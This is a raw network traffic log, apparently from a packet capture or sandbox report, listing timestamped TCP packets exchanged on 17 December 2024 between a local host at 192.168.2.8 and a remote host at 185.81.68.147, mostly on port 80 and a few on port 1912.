                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.211249113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.211332083 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.211411953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.212272882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.212376118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.212409973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.213129044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.213162899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.213202000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.214019060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.214052916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.214215994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.215116978 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.215152979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.215190887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.216012955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.216053963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.216063023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.216769934 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.216821909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.216948986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.217972040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.218004942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.218039989 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.218797922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.218864918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.218945026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.219737053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.219856977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.219886065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.220690966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.220773935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.220863104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.221729994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.221782923 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.221868992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.222559929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.222665071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.222700119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.223548889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.223674059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.223710060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.224584103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.224617958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.224652052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.225513935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.225580931 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.225811958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.226564884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.226654053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.226706028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.247936964 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.269777060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.369776011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.369978905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.370187998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.370229959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.370294094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.370492935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.371160030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.371260881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.371437073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.372077942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.372235060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.372430086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.373013020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.373123884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.373193026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.373944998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.373997927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.374139071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.374887943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.375005960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.375061035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.375845909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.375962973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.376041889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.376861095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.376980066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.377042055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.377808094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.377871990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.377968073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.378741026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.378884077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.378951073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.379719019 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.379849911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.379919052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.380614042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.380666971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.380742073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.381577015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.381715059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.381819963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.382504940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.382647038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.382725000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.383486032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.383651972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.383728981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.384398937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.384527922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.384613037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.385375023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.385512114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.385632038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.386321068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.386504889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.386689901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.387264013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.387455940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.387511015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.388257980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.388426065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.388506889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.389210939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.389322042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.389390945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.390203953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.390259027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.390345097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.391093016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.391191006 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.391319036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.392134905 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.392219067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.392374039 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.392993927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.393224001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.393275023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.394011974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.394133091 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.394218922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.394917965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.395040035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.395273924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.395862103 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.395981073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.396208048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.396894932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.397021055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.397084951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.397768974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.397907972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.398013115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.398689985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.398804903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.398914099 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.399698973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.399847984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.399909019 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.400784969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.400837898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.400898933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.401541948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.401681900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.401736975 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.402502060 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.402647018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.402746916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.403630972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.403778076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.403852940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.404463053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.404654980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.404789925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.405364037 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.405548096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.405615091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.406341076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.406469107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.406630993 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.407275915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.407426119 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.407506943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.408309937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.408391953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.408456087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.409183025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.409349918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.409498930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.410129070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.410239935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.410418987 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.411117077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.411389112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.411442041 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.412005901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.412161112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.412228107 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413053989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413180113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413254023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.413949013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.414015055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.414072990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.414894104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415108919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415209055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415882111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.415934086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416021109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416800022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416867971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.416982889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.417743921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.417874098 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.417942047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.418745995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.419053078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.419162035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.419704914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.472908974 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.561811924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.561861038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562040091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562228918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562355995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.562447071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.563242912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.563493013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.563568115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.564145088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.564258099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.564332962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.565182924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.565237045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.565305948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.566075087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.566143036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.566194057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567029953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567065954 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567253113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.567961931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.568099976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.568170071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.568964005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569104910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569188118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569852114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.569997072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570051908 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570159912 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570811033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570867062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.570938110 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.571742058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.571855068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.571918964 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.572700977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.572796106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.572906971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.573672056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.573821068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.573875904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.574590921 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.574711084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.574856997 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.575556993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.575664043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.575867891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.576507092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.576603889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.576731920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.577460051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.577584982 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.577641010 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.578449965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.578571081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.578727961 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.579384089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.579500914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.579782009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.580346107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:12.580398083 CET8049709185.81.68.147192.168.2.8
